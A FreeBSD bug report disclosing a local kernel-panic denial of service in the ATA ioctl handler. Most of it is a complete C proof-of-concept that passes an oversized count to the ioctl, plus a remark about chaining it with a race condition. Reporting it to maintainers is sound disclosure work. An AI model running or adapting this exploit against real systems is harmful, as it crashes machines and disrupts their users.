>Number: 136726 >Category: misc >Synopsis: Ata device local denial of service exploit >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jul 13 20:00:07 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Vincenzo Barranco >Release: 6.0 8.0 >Organization: >Environment: >Description: /* atapanic.c * * Vincenzo Barranco, 13 July 2009 * * this panics the freebsd kernel by passing a large value to malloc(9) in one of * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the * ata device in /dev to be able to open() the device. chain with some race condition * bug? * * - shaun * */ #include <sys/types.h> #include <sys/ioctl.h> #include <sys/stat.h> #include <fcntl.h> struct ata_ioc_requestz { union { struct { u_int8_t command; u_int8_t feature; u_int64_t lba; u_int16_t count; } ata; struct { char ccb[16]; } atapi; } u; caddr_t data; int count; int flags; int timeout; int error; }; #define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz) int main() { struct ata_ioc_requestz evil; int fd; evil.count = 0xffffffff; fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */ ioctl(fd, IOCATAREQUEST, &evil); /* should never reach here if kernel panics */ return 0; } >How-To-Repeat: Run the program on the top >Fix: >Release-Note: >Audit-Trail: >Unformatted: _______________________________________________ freebsd-bugs@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-bugs To unsubscribe, send any mail to "freebsd-bugs-unsubscribe@freebsd.org"